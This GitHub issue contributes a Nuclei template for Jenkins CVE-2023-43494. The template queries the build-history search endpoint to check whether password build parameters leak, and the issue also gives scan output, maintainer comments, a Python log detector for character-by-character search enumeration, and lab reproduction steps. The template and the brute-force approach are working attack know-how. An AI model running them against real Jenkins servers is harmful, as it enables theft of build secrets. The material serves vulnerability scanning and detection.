
Added CVE-2023-43494 Template #10550

Open
sagarwal395 opened this issue Aug 15, 2024 · 4 comments
Assignees
Labels
template-contribution Nuclei template contribution

Comments


sagarwal395 commented Aug 15, 2024

Template Information:

Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.

References:
https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
http://www.openwall.com/lists/oss-security/2023/09/20/5

Nuclei Template:

id: jenkins-cve-2023-43494

info:
  name: Jenkins CVE-2023-43494 Exploit
  author: Saumya Agarwal
  severity: medium
  description: |
    Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/09/20/5
    - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cve-id: CVE-2023-43494
    cwe-id: CWE-200
  tags: jenkins, cve-2023-43494, exploit

# Both values are supplied on the CLI (-var project_name=<job> -var search_string=<term>);
# the request itself must be authenticated as a user holding Item/Read.
variables:
  project_name: "{{project_name}}"
  search_string: "{{search_string}}"

# "requests:" is the pre-v3 protocol keyword that causes the "deprecated protocol syntax"
# warning in the output below; "http:" is the current name for the same block.
http:
  - method: GET
    path:
      - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"

    headers:
      accept: "*/*"
      accept-language: "en-US,en;q=0.9"
      sec-fetch-mode: "cors"
      sec-fetch-site: "same-origin"
      referer: "{{BaseURL}}/job/{{project_name}}/"
      # "referrerPolicy" was copied from a browser fetch() call; it is a fetch option,
      # not an HTTP header, so it is not sent.

    # Without this, Nuclei combines multiple matchers with OR, so every HTTP 200 from the
    # endpoint would be reported as a finding regardless of whether a build row came back.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>"

Expected output:

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

		projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[jenkins-cve-2023-43494] [http] [medium] http://sample:1102e6286d7b37da45c20c34d1adeb3800@localhost:8080/job/vulcheck/buildHistory/ajax?search=nuc
@sagarwal395 sagarwal395 added the template-contribution Nuclei template contribution label Aug 15, 2024
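An added detection example, not part of this issue or of the template above: it parses constructed reverse-proxy access log lines for the buildHistory/ajax?search= endpoint the template requests and flags an actor whose search strings against one job grow one character at a time, which is the iterative-character pattern the CVE description refers to. The combined log format, the assumption that a proxy in front of Jenkins logs the basic-auth username, and the thresholds are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in nginx/Apache "combined" format. The third column holds the
# basic-auth username (user:api-token, as in the nuclei output above), when present.
SAMPLE_LOG = """\
10.0.0.5 - sample [15/Aug/2024:10:00:01 +0000] "GET /job/vulcheck/buildHistory/ajax?search=a HTTP/1.1" 200 512 "-" "nuclei"
10.0.0.5 - sample [15/Aug/2024:10:00:01 +0000] "GET /job/vulcheck/buildHistory/ajax?search=n HTTP/1.1" 200 1840 "-" "nuclei"
10.0.0.5 - sample [15/Aug/2024:10:00:02 +0000] "GET /job/vulcheck/buildHistory/ajax?search=na HTTP/1.1" 200 512 "-" "nuclei"
10.0.0.5 - sample [15/Aug/2024:10:00:02 +0000] "GET /job/vulcheck/buildHistory/ajax?search=nu HTTP/1.1" 200 1840 "-" "nuclei"
10.0.0.5 - sample [15/Aug/2024:10:00:03 +0000] "GET /job/vulcheck/buildHistory/ajax?search=nuc HTTP/1.1" 200 1840 "-" "nuclei"
10.0.0.9 - alice [15/Aug/2024:10:05:00 +0000] "GET /job/vulcheck/buildHistory/ajax?search=release HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.9 - alice [15/Aug/2024:10:05:04 +0000] "GET /job/vulcheck/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PATH_RE = re.compile(r"^/job/(?P<job>[^/]+)/buildHistory/ajax$")


def parse_searches(log_text):
    """Yield (actor, job, search_string) for every build-history search request."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        p = PATH_RE.match(url.path)
        if not p:
            continue  # some other Jenkins path
        search = parse_qs(url.query).get("search", [""])[0]
        actor = m["user"] if m["user"] != "-" else m["ip"]  # fall back to IP if unauthenticated
        yield actor, unquote(p["job"]), search


def longest_prefix_chain(searches):
    """Length of the longest run where each search extends a previously seen one by one character."""
    chain = {}
    for s in searches:
        prev = chain.get(s[:-1], 0) if len(s) > 1 else 0
        chain[s] = max(chain.get(s, 0), prev + 1)
    return max(chain.values(), default=0)


def find_enumeration(log_text, min_requests=4, min_chain=3):
    """Return {(actor, job): (request_count, chain_length)} for actors whose searches
    against a single job look like character-by-character guessing."""
    per_key = defaultdict(list)
    for actor, job, search in parse_searches(log_text):
        per_key[(actor, job)].append(search)
    return {
        key: (len(s), longest_prefix_chain(s))
        for key, s in per_key.items()
        if len(s) >= min_requests and longest_prefix_chain(s) >= min_chain
    }
```

Normal users searching build history by a build name or keyword produce one or two unrelated strings, so they fall below both thresholds; only the growing-prefix sequence is reported.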
@DhiyaneshGeek (Member) commented:

Hi @sagarwal395

Does this require the project_name and search_string inputs to be supplied via the variable option in the CLI?

Looking forward to hearing back from you.

Thanks


sagarwal395 commented Aug 15, 2024

Hi @DhiyaneshGeek,

Yes, it does. It also requires the username and password of an attacker with Item/Read permission.
At a high level, the issue is that sensitive build variables like passwords are not excluded from the search in the build history, and an attacker can fuzz through it to get passwords used in any builds.

@DhiyaneshGeek (Member) commented:

@sagarwal395

Any docker setup instructions?

@sagarwal395 (Author) commented:

@sagarwal395

any docker setup instructions?

As of now, no. Sorry, I have been busy with school. I will share the instructions for docker once ready.
If you want to quickly test it, here are the steps:

  1. Run jenkins 2.41x and create a project with a password parameter. Run this job once. You can update the password and run multiple jobs.
  2. Create a user with an API key and read-only permission.
  3. Test the committed nuclei template with all the info. The vulnerability allows an attacker to search for a job in the history using the password as the search string (in a real-world scenario these can be brute forced).
